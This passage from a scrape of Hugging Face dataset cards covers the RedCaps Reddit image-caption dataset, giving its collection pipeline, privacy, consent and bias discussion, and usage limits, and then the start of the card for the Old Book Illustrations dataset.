that we curate in RedCaps. We made specific design choices while curating RedCaps to avoid
large quantities of images containing people:
(a) We collect data from manually curated subreddits, most of which primarily pertain
to animals, objects, places, or activities. We exclude all subreddits whose primary purpose
is to share and describe images of people (such as celebrity photos or user selfies).
(b) We use an off-the-shelf face detector to find and remove images with potential presence of
human faces. We manually checked 50K random images in RedCaps (Q16) and found 79
images with identifiable human faces – the entire dataset may have ≈19K (0.15%) images
with identifiable people. Refer Section 2.2 in the main paper.
> **Is it possible to identify one or more natural persons, either directly or indirectly (i.e., in
combination with other data) from the dataset?**
Yes, all instances in RedCaps include Reddit usernames of their post authors. This could be
used to look up the Reddit user profile, and some Reddit users may have identifying information
in their profiles. Some images may contain human faces which could be identified by
appearance. However, note that all this information is already public on Reddit, and searching it
in RedCaps is no easier than searching directly on Reddit.
> **Were the individuals in question notified about the data collection?**
No. Reddit users are anonymous by default, and are not required to share their personal contact
information (email, phone numbers, etc.). Hence, the only way to notify the authors of RedCaps
image posts is by sending them private messages on Reddit. This is practically difficult to do
manually, and will be classified as spam and blocked by Reddit if attempted to programmatically
send a templated message to millions of users.
> **Did the individuals in question consent to the collection and use of their data?**
Users did not explicitly consent to the use of their data in our dataset. However, by uploading
their data on Reddit, they consent that it would appear on the Reddit plaform and will be
accessible via the official Reddit API (which we use to collect RedCaps).
> **If consent was obtained, were the consenting individuals provided with a mechanism to
revoke their consent in the future or for certain uses?**
Users have full control over the presence of their data in our dataset. If users wish to revoke
their consent, they can delete the underlying Reddit post – it will be automatically removed
from RedCaps since we distribute images as URLs. Moreover, we provide an opt-out request
form on our dataset website for anybody to request removal of an individual instance if it is
potentially harmful (e.g. NSFW, violates privacy, harmful stereotypes, etc.).
## Considerations for Using the Data
### Social Impact of Dataset
From the paper:
> **Has an analysis of the potential impact of the dataset and its use on data subjects (e.g.,
a data protection impact analysis) been conducted?**
No.
### Discussion of Biases
From the paper:
> **Harmful Stereotypes**: Another concern with
Reddit data is that images or language may represent harmful stereotypes about gender, race, or other
characteristics of people [48, 49, 51]. We select only non-NSFW subreddits with active moderation
for collecting data. This stands in contrast to less curated uses of Reddit data, such as GPT-2 [35]
whose training data includes at least 63K documents from banned or quarantined subreddits which
may contain toxic language [53]. We attempt to further reduce harmful stereotypes in two ways:
> * **NSFW images**: We use the InceptionV3 [54] model from [55] to filter images detected as porn or hentai with confidence ≥ 0.9. Similar to face filtering, we estimated precision of our filtering and estimated amount of missed detections, shown in Table 1. The model detects 87K images with low
precision (∼1%) – most detections are non-NSFW images with pink and beige hues.
> * **Potentially derogatory language**: We filter instances whose captions contain words or phrases from a common blocklist [56]. It is important to note that such coarse filtering might suppress language from marginalized groups reclaiming slurs [51]; however, as RedCaps is not intended to describe people, we believe this is a pragmatic tradeoff to avoid propagating harmful labels.
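On the caption side, the blocklist filter amounts to simple phrase matching; a hedged sketch follows (the actual blocklist [56] is not reproduced here, so the entries are placeholders):

```python
BLOCKLIST = {"placeholder_phrase_1", "placeholder_phrase_2"}

def caption_is_clean(caption: str) -> bool:
    # Reject the instance if any blocklisted word or phrase appears.
    lowered = f" {caption.lower()} "
    return not any(f" {phrase} " in lowered for phrase in BLOCKLIST)
```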
> **Reddit demographics**: Reddit’s user demographics are not representative of the population at large.
Compared to US adults, Reddit users skew male (69% vs 49%), young (58% 18-29 years old vs
22%), college educated (36% vs 28%), and politically liberal (41% vs 25%) [57]. Reddit users
are predominantly white (63%) [57], and 49% of desktop traffic to Reddit comes from the United
States [58]. All of the subreddits in RedCaps use English as their primary language. Taken together,
these demographic biases likely also bias the types of objects and places that appear in images on
Reddit, and the language used to describe these images. We do not offer explicit countermeasures to
these biases, but users of RedCaps should keep in mind that size doesn’t guarantee diversity [51].
Subtler issues may also exist, such as imbalanced representation of demographic groups [59] or
gender bias in object co-occurrence [60] or language [61]. These are hard to control in internet
data, so we release RedCaps with explicit instructions on suitable use-cases; specifically requesting models not be trained to identify people, or make decisions that impact people. We document these instructions and other terms-of-use in a datasheet [45], provided in Appendix G.
> **Does the dataset contain data that, if viewed directly, might be offensive, insulting, threatening, or might otherwise cause anxiety?**
The scale of RedCaps means that we are unable to verify the contents of all images and
captions. However we have tried to minimize the possibility that RedCaps contains data that
might be offensive, insulting, threatening, or might cause anxiety via the following mitigations:
(a) We manually curate the set of subreddits from which to collect data; we only chose
subreddits that are not marked NSFW and which generally contain non-offensive content.
(b) Within our curated subreddits, we did not include any posts marked NSFW.
(c) We removed all instances whose captions contained any of the 400 potentially offensive
words or phrases. Refer Section 2.2 in the main paper.
(d) We remove all instances whose images were flagged NSFW by an off-the-shelf detector.
We manually checked 50K random images in RedCaps and found one image containing
nudity (exposed buttocks; no identifiable face). Refer Section 2.2 in the main paper
> **Does the dataset identify any subpopulations (e.g., by age, gender)?**
RedCaps does not explicitly identify any subpopulations. Since some images contain people
and captions are free-form natural language written by Reddit users, it is possible that some
captions may identify people appearing in individual images as part of a subpopulation.
> **Were any ethical review processes conducted (e.g., by an institutional review board)?**
We did not conduct a formal ethical review process via institutional review boards. However,
as described in Section 2.2 of the main paper and Q16 we employed several filtering mechanisms
to try and remove instances that could be problematic.
### Other Known Limitations
From the paper:
> **Are there any errors, sources of noise, or redundancies in the dataset?**
RedCaps is noisy by design since image-text pairs on the internet are noisy and unstructured.
Some instances may also have duplicate images and captions – Reddit users may have shared
the same image post in multiple subreddits. Such redundancies constitute a very small fraction
of the dataset, and should have almost no effect in training large-scale models.
> **Does the dataset contain data that might be considered confidential (e.g., data that is
protected by legal privilege or by doctor-patient confidentiality, data that includes the
content of individuals non-public communications)?**
No, the subreddits included in RedCaps do not cover topics that may be considered confidential. All posts were publicly shared on Reddit prior to inclusion in RedCaps.
## Additional Information
### Dataset Curators
From the paper:
> Four researchers at the University of Michigan (affiliated as of 2021) have created RedCaps:
Karan Desai, Gaurav Kaul, Zubin Aysola, and Justin Johnson.
### Licensing Information
The image metadata is licensed under the CC-BY 4.0 license. Additionally, uses of this dataset are subject to the Reddit API terms (https://www.reddit.com/wiki/api-terms), and users must comply with the Reddit User Agreement, Content Policy,
and Privacy Policy – all accessible at https://www.redditinc.com/policies.
From the paper:
> RedCaps should only be used for non-commercial research. RedCaps should not be used for any tasks that involve identifying features related to people (facial recognition, gender, age, ethnicity identification, etc.) or make decisions that impact people (mortgages, job applications, criminal sentences; or moderation decisions about user-uploaded data that could result in bans from a website). Any commercial and for-profit uses of RedCaps are restricted – it should not be used to train models that will be deployed in production systems as part of a product offered by businesses or government agencies.
### Citation Information
```bibtex
@misc{desai2021redcaps,
title={RedCaps: web-curated image-text data created by the people, for the people},
author={Karan Desai and Gaurav Kaul and Zubin Aysola and Justin Johnson},
year={2021},
eprint={2111.11431},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
```
### Contributions
Thanks to [@mariosasko](https://github.com/mariosasko) for adding this dataset. | actdan2016/sample1 | [
"task_categories:image-to-text",
"task_ids:image-captioning",
"annotations_creators:found",
"language_creators:found",
"multilinguality:monolingual",
"size_categories:10M<n<100M",
"source_datasets:original",
"language:en",
"license:cc-by-4.0",
"arxiv:2111.11431",
"region:us"
] | 2022-07-28T06:58:41+00:00 | {"annotations_creators": ["found"], "language_creators": ["found"], "language": ["en"], "license": ["cc-by-4.0"], "multilinguality": ["monolingual"], "size_categories": ["10M<n<100M"], "source_datasets": ["original"], "task_categories": ["image-to-text"], "task_ids": ["image-captioning"], "paperswithcode_id": "redcaps", "pretty_name": "RedCaps"} | 2022-08-29T01:12:39+00:00 | [
"2111.11431"
] | [
"en"
] | TAGS
#task_categories-image-to-text #task_ids-image-captioning #annotations_creators-found #language_creators-found #multilinguality-monolingual #size_categories-10M<n<100M #source_datasets-original #language-English #license-cc-by-4.0 #arxiv-2111.11431 #region-us
|
# Dataset Card for RedCaps
## Table of Contents
- Table of Contents
- Dataset Information
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Information
- Path /home/URL
- Content type image
- Tag sensor, common, ai, dataset
- Description
- Homepage: RedCaps homepage
- Repository: RedCaps repository
- Paper: RedCaps: web-curated image-text data created by the people, for the people
- Leaderboard:
- Point of Contact: Karan Desai
### Dataset Summary
RedCaps is a large-scale dataset of 12M image-text pairs collected from Reddit.
Images and captions from Reddit depict and describe a wide variety of objects and scenes.
The data is collected from a manually curated set of subreddits (350 total),
which give coarse image labels and allow steering of the dataset composition
without labeling individual instances. RedCaps data is created *by the people, for the people* – it contains everyday things that users like to share on social media, for example hobbies (r/crafts) and pets (r/shiba). Captions often contain specific and
fine-grained descriptions (northern cardinal, taj mahal). Subreddit names provide relevant image
labels (r/shiba) even when captions may not (mlem!), and sometimes may group many visually
unrelated images through a common semantic meaning (r/perfectfit).
### Dataset Preprocessing
This dataset doesn't download the images locally by default. Instead, it exposes URLs to the images. To fetch the images, use the following code:
Some image links point to more than one image. You can process and download those as follows:
Note that in the above code, we use the 'datasets.Sequence' feature to represent a list of images for the multi-image links.
### Supported Tasks and Leaderboards
From the paper:
> We have used our dataset to train deep neural networks that perform image captioning, and
that learn transferable visual representations for a variety of downstream visual recognition tasks
(image classification, object detection, instance segmentation).
> We anticipate that the dataset could be used for a variety of vision-and-language (V&L) tasks,
such as image or text retrieval or text-to-image synthesis.
### Languages
All of the subreddits in RedCaps use English as their primary language.
## Dataset Structure
### Data Instances
Each instance in RedCaps represents a single Reddit image post:
### Data Fields
- 'image_id': Unique alphanumeric ID of the image post (assigned by Reddit).
- 'author': Reddit username of the image post author.
- 'image_url': Static URL for downloading the image associated with the post.
- 'raw_caption': Textual description of the image, written by the post author.
- 'caption': Cleaned version of "raw_caption" by us (see Q35).
- 'subreddit': Name of subreddit where the post was submitted.
- 'score': Net upvotes (discounting downvotes) received by the image post. This field is equal to 'None' if the image post is a crosspost.
- 'created_utc': Integer time epoch (in UTC) when the post was submitted to Reddit.
- 'permalink': Partial URL of the Reddit post (URL
- 'crosspost_parents': List of parent posts. This field is optional.
### Data Splits
All the data is contained in the training set. The training set has nearly 12M (12,011,111) instances.
From the paper:
> We intend our dataset to be primarily used for pre-training with one or more specific downstream task(s) in mind. Hence, all instances in our dataset would be used for training while
the validation split is derived from downstream task(s). If users require a validation split, we
recommend sampling it such that it follows the same subreddit distribution as the entire dataset.
## Dataset Creation
### Curation Rationale
From the paper:
> Large datasets of image-text pairs are widely used for pre-training generic representations
that transfer to a variety of downstream vision and vision-and-language tasks. Existing public
datasets of this kind were curated from search engine results (SBU Captions [1]) or HTML
alt-text from arbitrary web pages (Conceptual Captions [2, 31]). They performed complex
data filtering to deal with noisy web data. Due to aggressive filtering, their data collection is
inefficient and diversity is artificially suppressed. We argue that the quality of data depends on
its source, and the human intent behind its creation. In this work, we explore Reddit – a social
media platform, for curating high quality data. We introduce RedCaps – a large dataset of
12M image-text pairs from Reddit. While we expect the use-cases of RedCaps to be similar to
existing datasets, we discuss how Reddit as a data source leads to fast and lightweight collection,
better data quality, lets us easily steer the data distribution, and facilitates ethically responsible data curation.
### Source Data
#### Initial Data Collection and Normalization
From the paper:
> Data Collection Pipeline
Reddit’s uniform structure allows us to parallelize data collection as independent tasks – each task
involves collecting posts submitted to a single subreddit in one year. Our collection pipeline has three steps: (1) subreddit selection, (2) image post filtering, and (3) caption cleaning.
Step 1. Subreddit selection: We collect data from a manually curated set of subreddits. Subreddits
have their own rules, community norms, and moderators so curating subreddits allows us to steer the
dataset’s composition without annotating individual instances. We select subreddits with a high volume of images posts, where images tend to be photographs (rather than memes, drawings, screenshots,
etc) and post titles tend to describe image content (rather than making jokes, political commentary,
etc). We do not select any NSFW, banned, or quarantined subreddits. We want to minimize the
number of people that appear in RedCaps, so we omit subreddits whose primary purpose is to share or
comment on images of people (such as celebrity pics or user selfies). We choose subreddits focused on
general photography (r/pics, r/itookapicture), animals (r/axolotls, r/birdsofprey, r/dachshund),
plants (r/roses, r/succulents), objects (r/classiccars, r/trains, r/mechanicalkeyboards), food
(r/steak, r/macarons), scenery (r/cityporn, r/desertporn), or activities (r/carpentry, r/kayaking).
In total we collect data from 350 subreddits; the full list can be found in Appendix A.
Step 2. Image post filtering: We use Pushshift [41] and Reddit [42, 43] APIs to download all image
posts submitted to our selected subreddits from 2008–2020. Posts are collected at least six months
after their creation to let upvotes stabilize. We only collect posts with images hosted on three domains:
Reddit (i.URL), Imgur (i.URL), and Flickr (URL). Some image posts contain
multiple images (gallery posts) – in this case we only collect the first image and associate it with
the caption. We discard posts with < 2 upvotes to avoid unappealing content, and we discard posts
marked NSFW (by their authors or subreddit moderators) to avoid pornographic or disturbing content.
Step 3. Caption cleaning: We expect Reddit post titles to be less noisy than other large-scale
sources of image captions such as alt-text [2, 31], so we apply minimal text cleaning. We lowercase
captions and use ftfy [44] to remove character accents, emojis, and non-latin characters, following
[29, 35, 36]. Then we apply simple pattern matching to discard all sub-strings enclosed in brackets
((.*), [.*]). These sub-strings usually give non-semantic information: original content tags [oc],
image resolutions (800x600 px), camera specs (shot with iPhone), self-promotion [Instagram:
@user], and other references (link in comments). Finally, like [31] we replace social media
handles (words starting with ‘@’) with a [USR] token to protect user privacy and reduce redundancy.
Due to such filtering, ≈12K (0.1%) captions in our dataset are empty strings. We do not discard them,
as subreddit names alone provide meaningful supervision. Unlike CC-3M or CC-12M that discard
captions without nouns or that don’t overlap image tags, we do not discard any instances in this step.
Through this pipeline, we collect 13.4M instances from 350 subreddits. Our collection pipeline is
less resource-intensive than existing datasets – we do not require webpage crawlers, search engines,
or large databases of indexed webpages. RedCaps is easily extensible in the future by selecting more
subreddits and collecting posts from future years. Next, we perform additional filtering to mitigate
user privacy risks and harmful stereotypes in RedCaps, resulting in a final size of 12M instances.
#### Who are the source language producers?
Reddit is the singular data source for RedCaps.
### Annotations
#### Annotation process
The dataset is built using fully automatic data collection pipeline which doesn't require any human annotators.
#### Who are the annotators?
The annotation process doesn't require any human annotators.
### Personal and Sensitive Information
From the paper:
> Does the dataset relate to people?
The dataset pertains to people in that people wrote the captions and posted images to Reddit
that we curate in RedCaps. We made specific design choices while curating RedCaps to avoid
large quantities of images containing people:
(a) We collect data from manually curated subreddits, most of which primarily pertain
to animals, objects, places, or activities. We exclude all subreddits whose primary purpose
is to share and describe images of people (such as celebrity photos or user selfies).
(b) We use an off-the-shelf face detector to find and remove images with potential presence of
human faces. We manually checked 50K random images in RedCaps (Q16) and found 79
images with identifiable human faces – the entire dataset may have ≈19K (0.15%) images
with identifiable people. Refer Section 2.2 in the main paper.
> Is it possible to identify one or more natural persons, either directly or indirectly (i.e., in
combination with other data) from the dataset?
Yes, all instances in RedCaps include Reddit usernames of their post authors. This could be
used to look up the Reddit user profile, and some Reddit users may have identifying information
in their profiles. Some images may contain human faces which could be identified by
appearance. However, note that all this information is already public on Reddit, and searching it
in RedCaps is no easier than searching directly on Reddit.
> Were the individuals in question notified about the data collection?
No. Reddit users are anonymous by default, and are not required to share their personal contact
information (email, phone numbers, etc.). Hence, the only way to notify the authors of RedCaps
image posts is by sending them private messages on Reddit. This is practically difficult to do
manually, and programmatically sending a templated message to millions of users would be
classified as spam and blocked by Reddit.
> Did the individuals in question consent to the collection and use of their data?
Users did not explicitly consent to the use of their data in our dataset. However, by uploading
their data on Reddit, they consent that it would appear on the Reddit platform and will be
accessible via the official Reddit API (which we use to collect RedCaps).
> If consent was obtained, were the consenting individuals provided with a mechanism to
revoke their consent in the future or for certain uses?
Users have full control over the presence of their data in our dataset. If users wish to revoke
their consent, they can delete the underlying Reddit post – it will be automatically removed
from RedCaps since we distribute images as URLs. Moreover, we provide an opt-out request
form on our dataset website for anybody to request removal of an individual instance if it is
potentially harmful (e.g. NSFW, violates privacy, harmful stereotypes, etc.).
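As an illustration of the face-filtering mitigation described above, the sketch below uses MTCNN from `facenet-pytorch` as a stand-in detector. The paper does not publish this code, so the detector choice and the 0.9 confidence threshold are assumptions.

```python
from PIL import Image
from facenet_pytorch import MTCNN  # pip install facenet-pytorch

detector = MTCNN(keep_all=True)  # off-the-shelf face detector (stand-in choice)


def has_identifiable_face(image_path: str, min_confidence: float = 0.9) -> bool:
    """Return True if the image likely contains at least one human face."""
    image = Image.open(image_path).convert("RGB")
    boxes, probs = detector.detect(image)
    if boxes is None:  # no face candidates found
        return False
    return any(p is not None and p >= min_confidence for p in probs)


# Posts whose images trip the detector are dropped before release.
```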
## Considerations for Using the Data
### Social Impact of Dataset
From the paper:
> Has an analysis of the potential impact of the dataset and its use on data subjects (e.g.,
a data protection impact analysis) been conducted?
No.
### Discussion of Biases
From the paper:
> Harmful Stereotypes: Another concern with
Reddit data is that images or language may represent harmful stereotypes about gender, race, or other
characteristics of people [48, 49, 51]. We select only non-NSFW subreddits with active moderation
for collecting data. This stands in contrast to less curated uses of Reddit data, such as GPT-2 [35]
whose training data includes at least 63K documents from banned or quarantined subreddits which
may contain toxic language [53]. We attempt to further reduce harmful stereotypes in two ways:
> * NSFW images: We use the InceptionV3 [54] model from [55] to filter images detected as porn or hentai with confidence ≥ 0.9. Similar to face filtering, we estimated precision of our filtering and estimated amount of missed detections, shown in Table 1. The model detects 87K images with low
precision (∼1%) – most detections are non-NSFW images with pink and beige hues.
> * Potentially derogatory language: We filter instances whose captions contain words or phrases from a common blocklist [56]. It is important to note that such coarse filtering might suppress language from marginalized groups reclaiming slurs [51]; however, as RedCaps is not intended to describe people, we believe this is a pragmatic tradeoff to avoid propagating harmful labels.
> Reddit demographics: Reddit’s user demographics are not representative of the population at large.
Compared to US adults, Reddit users skew male (69% vs 49%), young (58% 18-29 years old vs
22%), college educated (36% vs 28%), and politically liberal (41% vs 25%) [57]. Reddit users
are predominantly white (63%) [57], and 49% of desktop traffic to Reddit comes from the United
States [58]. All of the subreddits in RedCaps use English as their primary language. Taken together,
these demographic biases likely also bias the types of objects and places that appear in images on
Reddit, and the language used to describe these images. We do not offer explicit countermeasures to
these biases, but users of RedCaps should keep in mind that size doesn’t guarantee diversity [51].
Subtler issues may also exist, such as imbalanced representation of demographic groups [59] or
gender bias in object co-occurrence [60] or language [61]. These are hard to control in internet
data, so we release RedCaps with explicit instructions on suitable use-cases; specifically requesting models not be trained to identify people, or make decisions that impact people. We document these instructions and other terms-of-use in a datasheet [45], provided in Appendix G.
> Does the dataset contain data that, if viewed directly, might be offensive, insulting, threatening, or might otherwise cause anxiety?
The scale of RedCaps means that we are unable to verify the contents of all images and
captions. However we have tried to minimize the possibility that RedCaps contains data that
might be offensive, insulting, threatening, or might cause anxiety via the following mitigations:
(a) We manually curate the set of subreddits from which to collect data; we only chose
subreddits that are not marked NSFW and which generally contain non-offensive content.
(b) Within our curated subreddits, we did not include any posts marked NSFW.
(c) We removed all instances whose captions contained any of the 400 potentially offensive
words or phrases. Refer to Section 2.2 in the main paper.
(d) We remove all instances whose images were flagged NSFW by an off-the-shelf detector.
We manually checked 50K random images in RedCaps and found one image containing
nudity (exposed buttocks; no identifiable face). Refer to Section 2.2 in the main paper.
> Does the dataset identify any subpopulations (e.g., by age, gender)?
RedCaps does not explicitly identify any subpopulations. Since some images contain people
and captions are free-form natural language written by Reddit users, it is possible that some
captions may identify people appearing in individual images as part of a subpopulation.
> Were any ethical review processes conducted (e.g., by an institutional review board)?
We did not conduct a formal ethical review process via institutional review boards. However,
as described in Section 2.2 of the main paper and Q16, we employed several filtering mechanisms
to try and remove instances that could be problematic.
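The two content filters quoted at the start of this section can be sketched as follows. The blocklist contents and the NSFW scores are placeholders – the actual pipeline uses a ~400-phrase blocklist [56] and an InceptionV3 NSFW classifier [54, 55] whose exact setup is not reproduced here.

```python
BLOCKLIST = {"offensive phrase 1", "offensive phrase 2"}  # placeholder entries


def caption_is_clean(caption: str) -> bool:
    """Drop instances whose caption contains any blocklisted word or phrase."""
    lowered = caption.lower()
    return not any(term in lowered for term in BLOCKLIST)


def image_is_safe(nsfw_scores: dict) -> bool:
    """Drop images detected as porn or hentai with confidence >= 0.9."""
    return max(nsfw_scores.get("porn", 0.0), nsfw_scores.get("hentai", 0.0)) < 0.9


instance = {"caption": "my shiba mlem", "nsfw_scores": {"porn": 0.02, "hentai": 0.01}}
keep = caption_is_clean(instance["caption"]) and image_is_safe(instance["nsfw_scores"])
```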
### Other Known Limitations
From the paper:
> Are there any errors, sources of noise, or redundancies in the dataset?
RedCaps is noisy by design since image-text pairs on the internet are noisy and unstructured.
Some instances may also have duplicate images and captions – Reddit users may have shared
the same image post in multiple subreddits. Such redundancies constitute a very small fraction
of the dataset, and should have almost no effect in training large-scale models.
> Does the dataset contain data that might be considered confidential (e.g., data that is
protected by legal privilege or by doctor-patient confidentiality, data that includes the
content of individuals non-public communications)?
No, the subreddits included in RedCaps do not cover topics that may be considered confidential. All posts were publicly shared on Reddit prior to inclusion in RedCaps.
## Additional Information
### Dataset Curators
From the paper:
> Four researchers at the University of Michigan (affiliated as of 2021) have created RedCaps:
Karan Desai, Gaurav Kaul, Zubin Aysola, and Justin Johnson.
### Licensing Information
The image metadata is licensed under the CC-BY 4.0 license. Additionally, uses of this dataset are subject to the Reddit API terms (URL) and users must comply with the Reddit User Agreement, Content Policy,
and Privacy Policy – all accessible at URL.
From the paper:
> RedCaps should only be used for non-commercial research. RedCaps should not be used for any tasks that involve identifying features related to people (facial recognition, gender, age, ethnicity identification, etc.) or make decisions that impact people (mortgages, job applications, criminal sentences; or moderation decisions about user-uploaded data that could result in bans from a website). Any commercial and for-profit uses of RedCaps are restricted – it should not be used to train models that will be deployed in production systems as part of a product offered by businesses or government agencies.
### Contributions
Thanks to @mariosasko for adding this dataset.
# Dataset Card for Old Book Illustrations
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Discussion of Biases](#discussion-of-biases)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **[Homepage](https://www.oldbookillustrations.com/)**
### Dataset Summary
The Old Book Illustrations dataset contains 4172 illustrations scanned from old books. The collection was gathered and curated by the team of the website [Old Book Illustrations](https://www.oldbookillustrations.com/).
The webmaster of Old Book Illustrations kindly allowed us to scrape this information in order to create this dataset for the [BigLAM initiative](https://huggingface.co/biglam).
### Languages
The captions and descriptions are mostly in English but can contain some sentences from other languages such as French or German.
For instance, you can find this description that contains a French sentence:
>The caption reads in the original French: Vue de l’aqueduc de Salones qui conduisait l’eau à Spalatro.

(In English: “View of the aqueduct of Salona that carried water to Spalatro.”)
## Dataset Structure
Each row contains information gathered from the page of an illustration on the website [Old Book Illustrations](https://www.oldbookillustrations.com/). As of July 2022, there are 4172 illustrations in this dataset.
### Data Fields
* `rawscan`: the image as originally scanned from the book, without further processing
* `1600px`: the cleaned image, resized to a width of 1600 pixels (height can vary)
* `info_url`: URL to the illustration page on oldbookillustrations.com
* `info_src`: URL to an icon-sized version of the image
* `info_alt`: short description of the image
* `artist_name`: artist name
* `artist_birth_date`: birth date of the artist
* `artist_death_date`: death date of the artist
* `artist_countries`: list of the countries the artist is from
* `book_title`: original title of the book the illustration is extracted from
* `book_authors`: list of the authors of the book
* `book_publishers`: list of the publishers of the book
* `date_published`: date the book was originally published
* `openlibrary-url`: URL to the openlibrary entry for the book
* `tags`: list of keywords for this illustration on oldbookillustrations.com
* `illustration_source_name`: list of the sources for this illustration
* `illustration_source_url`: list of the URL for these sources
* `illustration_subject`: category of the subject represented in the illustration
* `illustration_format`: category of the format of the illustration
* `engravers`: list of the engravers of the illustration
* `image_title`: title of the image
* `image_caption`: caption of the image. Seems to be the caption that appears next to the image in the book, translated to English if in another language
* `image_description`: longer description of the image. If there is one, it also quotes the caption in the original language
* `rawscan_url`: URL to the rawscan image on oldbookillustrations.com
* `1600px_url`: URL to the cleaned image on oldbookillustrations.com
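A minimal example of loading the dataset with the 🤗 `datasets` library and reading a few of these fields (the image columns are decoded as PIL objects):

```python
from datasets import load_dataset

ds = load_dataset("gigant/oldbookillustrations", split="train")

example = ds[0]
print(example["image_title"])
print(example["image_caption"])
print("Artist:", example["artist_name"], "| Tags:", example["tags"])

cleaned = example["1600px"]  # PIL image: cleaned scan, 1600 px wide
cleaned.thumbnail((400, 400))  # downscale in place for a quick preview
```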
## Dataset Creation
### Curation Rationale
This collection was gathered and curated by the team of the website [Old Book Illustrations](https://www.oldbookillustrations.com/).
This version contains all the data that was available on the website as of July 2022, but the website is being actively maintained so if you want more old book illustrations, make sure to check [Old Book Illustrations](https://www.oldbookillustrations.com/).
### Source Data
#### Initial Data Collection and Normalization
Initial data is gathered from the website [Old Book Illustrations](https://www.oldbookillustrations.com/). The sources of the illustration scans are specified for each entry in the columns `illustration_source_name` and `illustration_source_url`.
### Personal and Sensitive Information
The Old Book Illustrations' Terms and conditions reads:
>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.
## Considerations for Using the Data
### Discussion of Biases
The Old Book Illustrations' Terms and conditions reads:
>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.
## Additional Information
### Dataset Curators
The Old Book Illustrations collection is curated and maintained by the team of the [Old Book Illustrations website](https://www.oldbookillustrations.com/).
### Licensing Information
[Old Book Illustrations](https://www.oldbookillustrations.com/) website reads:
>We don’t limit the use of the illustrations available on our site, but we accept no responsibility regarding any problem, legal or otherwise, which might result from such use. More specifically, we leave it up to users to make sure that their project complies with the copyright laws of their country of residence. Text content (descriptions, translations, etc.) is published under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
The Old Book Illustrations webmaster mentioned that most images are in the public domain in the US and Europe, but there can be some exceptions. Examples are the illustrations from [*Early poems of William Morris*](https://www.oldbookillustrations.com/titles/early-poems-of-william-morris/), whose illustrator died in 1955, so her work is not in the public domain in Europe as of 2022, or [*Under the hill*](https://www.oldbookillustrations.com/titles/under-the-hill/), which was published in the US in 1928 and is therefore not in the public domain there.
### Citation Information
```bibtex
@misc{oldbookillustrations_2007,
  url = {https://www.oldbookillustrations.com/},
  journal = {Old Book Illustrations},
  year = {2007}
}
```
### Contributions
Thanks to [@gigant](https://huggingface.co/gigant) ([@giganttheo](https://github.com/giganttheo)) for adding this dataset. | gigant/oldbookillustrations | [
"task_categories:text-to-image",
"task_categories:image-to-text",
"task_categories:image-to-image",
"task_ids:image-captioning",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:multilingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:en",
"language:fr",
"language:de",
"license:cc-by-nc-4.0",
"lam",
"1800-1900",
"region:us"
] | 2022-07-28T07:31:19+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["en", "fr", "de"], "license": ["cc-by-nc-4.0"], "multilinguality": ["multilingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["text-to-image", "image-to-text", "image-to-image"], "task_ids": ["image-captioning"], "pretty_name": "Old Book Illustrations", "tags": ["lam", "1800-1900"], "dataset_info": {"features": [{"name": "rawscan", "dtype": "image"}, {"name": "1600px", "dtype": "image"}, {"name": "info_url", "dtype": "string"}, {"name": "info_src", "dtype": "string"}, {"name": "info_alt", "dtype": "string"}, {"name": "artist_name", "dtype": "string"}, {"name": "artist_birth_date", "dtype": "string"}, {"name": "artist_death_date", "dtype": "string"}, {"name": "artist_countries", "sequence": "string"}, {"name": "book_title", "dtype": "string"}, {"name": "book_authors", "sequence": "string"}, {"name": "book_publishers", "sequence": "string"}, {"name": "date_published", "dtype": "string"}, {"name": "openlibrary-url", "dtype": "string"}, {"name": "tags", "sequence": "string"}, {"name": "illustration_source_name", "sequence": "string"}, {"name": "illustration_source_url", "sequence": "string"}, {"name": "illustration_subject", "dtype": "string"}, {"name": "illustration_format", "dtype": "string"}, {"name": "engravers", "sequence": "string"}, {"name": "image_title", "dtype": "string"}, {"name": "image_caption", "dtype": "string"}, {"name": "image_description", "dtype": "string"}, {"name": "rawscan_url", "dtype": "string"}, {"name": "1600px_url", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 6402149401.7, "num_examples": 4154}], "download_size": 5098832185, "dataset_size": 6402149401.7}} | 2023-12-18T13:39:10+00:00 | [] | [
"en",
"fr",
"de"
] | TAGS
#task_categories-text-to-image #task_categories-image-to-text #task_categories-image-to-image #task_ids-image-captioning #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-multilingual #size_categories-1K<n<10K #source_datasets-original #language-English #language-French #language-German #license-cc-by-nc-4.0 #lam #1800-1900 #region-us
|
# Dataset Card for Old Book Illustrations
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Dataset Creation
- Curation Rationale
- Source Data
- Personal and Sensitive Information
- Considerations for Using the Data
- Discussion of Biases
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
